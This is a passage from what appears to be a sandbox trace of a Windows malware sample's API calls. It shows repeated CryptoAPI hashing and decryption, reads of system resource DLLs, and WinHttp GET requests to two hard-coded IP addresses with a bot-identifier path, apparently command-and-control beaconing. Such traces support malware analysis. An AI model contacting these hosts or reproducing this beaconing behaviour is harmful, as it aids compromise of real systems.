hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.743] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd00, dwFlags=0x0) returned 1 [0119.744] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.744] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.744] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.744] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.744] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd20, dwFlags=0x0) returned 1 [0119.744] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.745] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.745] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.745] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.745] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd40, dwFlags=0x0) returned 1 [0119.745] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.745] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.745] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.746] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.746] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd60, dwFlags=0x0) returned 1 [0119.746] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.746] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.746] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.746] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.746] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xd80, dwFlags=0x0) returned 1 [0119.746] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.746] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.746] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.747] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.747] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xda0, dwFlags=0x0) returned 1 [0119.747] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.747] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.747] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.748] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.748] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xdc0, dwFlags=0x0) returned 1 [0119.748] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.748] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.748] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.748] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.748] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xde0, dwFlags=0x0) returned 1 [0119.748] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.748] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.748] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.749] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.749] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe00, dwFlags=0x0) returned 1 [0119.749] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.749] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.749] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.750] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.750] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe20, dwFlags=0x0) returned 1 [0119.750] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.750] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.750] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.750] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.750] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe40, dwFlags=0x0) returned 1 [0119.750] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.750] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.750] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.751] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.751] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe60, dwFlags=0x0) returned 1 [0119.751] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.751] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.751] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.751] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.751] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xe80, dwFlags=0x0) returned 1 [0119.751] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.751] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.752] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.752] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.752] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xea0, dwFlags=0x0) returned 1 [0119.752] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.752] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.752] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.753] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.753] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xec0, dwFlags=0x0) returned 1 [0119.753] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.753] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.753] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.753] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.753] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xee0, dwFlags=0x0) returned 1 [0119.753] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.753] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.753] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.754] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.754] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf00, dwFlags=0x0) returned 1 [0119.754] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.754] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.754] CryptAcquireContextW (in: phProv=0xce5b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce5b0*=0x72b850) returned 1 [0119.755] CryptCreateHash (in: hProv=0x72b850, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce5a0 | out: phHash=0xce5a0) returned 1 [0119.755] CryptHashData (hHash=0x72b510, pbData=0x32e4a600, dwDataLen=0xf20, dwFlags=0x0) returned 1 [0119.755] CryptDestroyHash (hHash=0x72b510) returned 1 [0119.755] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.757] CryptSetKeyParam (hKey=0x72b510, dwParam=0x4, pbData=0xce5f4*=0x1, dwFlags=0x0) returned 1 [0119.757] CryptSetKeyParam (hKey=0x72b510, dwParam=0x1, pbData=0x32e4e400, dwFlags=0x0) returned 1 [0119.800] CryptDecrypt (in: hKey=0x72b510, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x336b4040, pdwDataLen=0xce5dc | out: pbData=0x336b4040, pdwDataLen=0xce5dc) returned 0 [0119.801] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.801] CryptDestroyKey (hKey=0x72b510) returned 0 [0119.802] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x336b4040 | out: hHeap=0x2150000) returned 1 [0119.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4e400 | out: hHeap=0x2150000) returned 1 [0119.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4c0b0 | out: hHeap=0x2150000) returned 1 [0119.816] CloseHandle (hObject=0x238) returned 1 [0119.816] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x333b3040 | out: hHeap=0x2150000) returned 1 [0119.831] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41d10 | out: hHeap=0x2150000) returned 1 [0119.831] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AuthFWWizFwk.Resources.dll" (normalized: "c:\\windows\\system32\\en\\authfwwizfwk.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0119.835] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xdc00 [0119.835] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.835] ReadFile (in: hFile=0x238, lpBuffer=0x32e4ee50, nNumberOfBytesToRead=0xdc00, lpNumberOfBytesRead=0xce724, lpOverlapped=0x0 | out: lpBuffer=0x32e4ee50*, lpNumberOfBytesRead=0xce724*=0xdc00, lpOverlapped=0x0) returned 1 [0119.850] CryptSetKeyParam (hKey=0x72cf60, dwParam=0x4, pbData=0xce5f4*=0x1, dwFlags=0x0) returned 1 [0119.850] CryptSetKeyParam (hKey=0x72cf60, dwParam=0x1, pbData=0x32e5f1e0, dwFlags=0x0) returned 1 [0119.850] CryptDecrypt (in: hKey=0x72cf60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e5fa80, pdwDataLen=0xce5dc | out: pbData=0x32e5fa80, pdwDataLen=0xce5dc) returned 0 [0119.850] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.850] CryptDestroyKey (hKey=0x72cf60) returned 0 [0119.850] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5fa80 | out: hHeap=0x2150000) returned 1 [0119.863] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5f1e0 | out: hHeap=0x2150000) returned 1 [0119.863] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e5d0b0 | out: hHeap=0x2150000) returned 1 [0119.864] CloseHandle (hObject=0x238) returned 1 [0119.864] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ee50 | out: hHeap=0x2150000) returned 1 [0119.864] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41d10 | out: hHeap=0x2150000) returned 1 [0119.864] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\AutoWorkplace.Resources.dll" (normalized: "c:\\windows\\system32\\en\\autoworkplace.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0119.865] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1400 [0119.865] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.865] ReadFile (in: hFile=0x238, lpBuffer=0x32e4ee50, nNumberOfBytesToRead=0x1400, lpNumberOfBytesRead=0xce724, lpOverlapped=0x0 | out: lpBuffer=0x32e4ee50*, lpNumberOfBytesRead=0xce724*=0x1400, lpOverlapped=0x0) returned 1 [0119.883] CryptSetKeyParam (hKey=0x72d360, dwParam=0x4, pbData=0xce5f4*=0x1, dwFlags=0x0) returned 1 [0119.883] CryptSetKeyParam (hKey=0x72d360, dwParam=0x1, pbData=0x32e52480, dwFlags=0x0) returned 1 [0119.883] CryptDecrypt (in: hKey=0x72d360, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32e54280, pdwDataLen=0xce5dc | out: pbData=0x32e54280, pdwDataLen=0xce5dc) returned 0 [0119.883] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.883] CryptDestroyKey (hKey=0x72d360) returned 0 [0119.883] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e54280 | out: hHeap=0x2150000) returned 1 [0119.883] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e52480 | out: hHeap=0x2150000) returned 1 [0119.883] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e51d60 | out: hHeap=0x2150000) returned 1 [0119.883] CloseHandle (hObject=0x238) returned 1 [0119.883] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e4ee50 | out: hHeap=0x2150000) returned 1 [0119.883] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41d10 | out: hHeap=0x2150000) returned 1 [0119.883] CreateFileW (lpFileName="C:\\Windows\\system32\\EN\\fhuxpresentation.Resources.dll" (normalized: "c:\\windows\\system32\\en\\fhuxpresentation.resources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0119.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x3ec00 [0119.884] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.888] ReadFile (in: hFile=0x238, lpBuffer=0x32ac5770, nNumberOfBytesToRead=0x3ec00, lpNumberOfBytesRead=0xce724, lpOverlapped=0x0 | out: lpBuffer=0x32ac5770*, lpNumberOfBytesRead=0xce724*=0x3ec00, lpOverlapped=0x0) returned 1 [0119.902] CryptSetKeyParam (hKey=0x72d760, dwParam=0x4, pbData=0xce5f4*=0x1, dwFlags=0x0) returned 1 [0119.902] CryptSetKeyParam (hKey=0x72d760, dwParam=0x1, pbData=0x32e54880, dwFlags=0x0) returned 1 [0119.905] CryptDecrypt (in: hKey=0x72d760, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32b04380, pdwDataLen=0xce5dc | out: pbData=0x32b04380, pdwDataLen=0xce5dc) returned 0 [0119.905] CryptReleaseContext (hProv=0x72b850, dwFlags=0x0) returned 1 [0119.905] CryptDestroyKey (hKey=0x72d760) returned 0 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32b04380 | out: hHeap=0x2150000) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e54880 | out: hHeap=0x2150000) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e53e30 | out: hHeap=0x2150000) returned 1 [0119.905] CloseHandle (hObject=0x238) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32ac5770 | out: hHeap=0x2150000) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41900 | out: hHeap=0x2150000) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e412e0 | out: hHeap=0x2150000) returned 1 [0119.905] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e410c0 | out: hHeap=0x2150000) returned 1 [0119.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e41af0 | out: hHeap=0x2150000) returned 1 [0119.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e42330 | out: hHeap=0x2150000) returned 1 [0119.906] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e499c0 | out: hHeap=0x2150000) returned 1 [0119.906] GetTickCount () returned 0xe87d74 [0119.906] GetTickCount () returned 0xe87d74 [0119.906] WinHttpConnect (hSession=0x71b780, pswzServerName="103.56.207.230", nServerPort=0x1bb, dwReserved=0x0) returned 0x72b850 [0119.907] WinHttpOpenRequest (hConnect=0x72b850, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/kps/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x72db60 [0119.908] WinHttpSetOption (hInternet=0x72db60, dwOption=0x1f, lpBuffer=0xce088, dwBufferLength=0x4) returned 1 [0119.908] WinHttpSendRequest (hRequest=0x72db60, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 0 [0141.938] GetLastError () returned 0x2ee2 [0141.938] Sleep (dwMilliseconds=0x3e8) [0142.939] WinHttpCloseHandle (hInternet=0x72db60) returned 1 [0142.944] Sleep (dwMilliseconds=0x258) [0143.548] GetTickCount () returned 0xe8d9cd [0143.548] GetTickCount () returned 0xe8d9cd [0143.549] WinHttpCloseHandle (hInternet=0x72b850) returned 1 [0143.549] WinHttpConnect (hSession=0x71b780, pswzServerName="171.103.189.118", nServerPort=0x1c1, dwReserved=0x0) returned 0x728fa0 [0143.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e543d0 [0143.552] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcecc8 | out: lpSystemTimeAsFileTime=0xcecc8*(dwLowDateTime=0xe213df13, dwHighDateTime=0x1d7b3c9)) [0143.555] HeapFree (in: hHeap=0x2150000, dwFlags=0x8, lpMem=0x32e407b0 | out: hHeap=0x2150000) returned 1 [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x30) returned 0x32e407b0 [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.556] GetTickCount () returned 0xe8d9dd [0143.557] WinHttpOpenRequest (hConnect=0x728fa0, pwszVerb="GET", pwszObjectName="/tot153/XC64ZB_W10010586.FDB33F77971735B3BB3BB3B3B33B3B93/5/kps/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x7581f0 [0143.558] WinHttpSetOption (hInternet=0x7581f0, dwOption=0x1f, lpBuffer=0xce088, dwBufferLength=0x4) returned 1 [0143.558] WinHttpSendRequest (hRequest=0x7581f0, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0146.888] WinHttpReceiveResponse (hRequest=0x7581f0, lpReserved=0x0) returned 1 [0146.888] WinHttpQueryHeaders (in: hRequest=0x7581f0, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0xce084, lpdwBufferLength=0xce08c, lpdwIndex=0x0 | out: lpBuffer=0xce084*, lpdwBufferLength=0xce08c*=0x4, lpdwIndex=0x0) returned 1 [0146.889] WinHttpQueryDataAvailable (in: hRequest=0x7581f0, lpdwNumberOfBytesAvailable=0xce160 | out: lpdwNumberOfBytesAvailable=0xce160*=0xe0) returned 1 [0146.889] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0xe0) returned 0x32e41900 [0146.890] WinHttpReadData (in: hRequest=0x7581f0, lpBuffer=0x32e41900, dwNumberOfBytesToRead=0xe0, lpdwNumberOfBytesRead=0xce164 | out: lpBuffer=0x32e41900*, lpdwNumberOfBytesRead=0xce164*=0xe0) returned 1 [0146.890] WinHttpQueryDataAvailable (in: hRequest=0x7581f0, lpdwNumberOfBytesAvailable=0xce160 | out: lpdwNumberOfBytesAvailable=0xce160*=0x0) returned 1 [0146.894] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x10) returned 0x32e4a100 [0146.897] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x1000) returned 0x32e4a600 [0146.897] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.898] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.898] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x20, dwFlags=0x0) returned 1 [0146.898] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.898] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e545b0 [0146.898] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e545b0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e545b0, pdwDataLen=0xcea1c) returned 1 [0146.898] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.898] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.898] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.899] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.899] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x40, dwFlags=0x0) returned 1 [0146.899] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.899] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e544c0 [0146.899] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e544c0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e544c0, pdwDataLen=0xcea1c) returned 1 [0146.899] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.899] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.899] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.899] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.899] CryptHashData (hHash=0x332b7ac0, pbData=0x32e4a600, dwDataLen=0x60, dwFlags=0x0) returned 1 [0146.899] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.899] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e543a0 [0146.899] CryptGetHashParam (in: hHash=0x332b7ac0, dwParam=0x2, pbData=0x32e543a0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e543a0, pdwDataLen=0xcea1c) returned 1 [0146.899] CryptDestroyHash (hHash=0x332b7ac0) returned 1 [0146.899] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.899] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.900] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.900] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x80, dwFlags=0x0) returned 1 [0146.900] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.900] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54bb0 [0146.900] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54bb0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54bb0, pdwDataLen=0xcea1c) returned 1 [0146.900] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.900] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.900] CryptAcquireContextW (in: 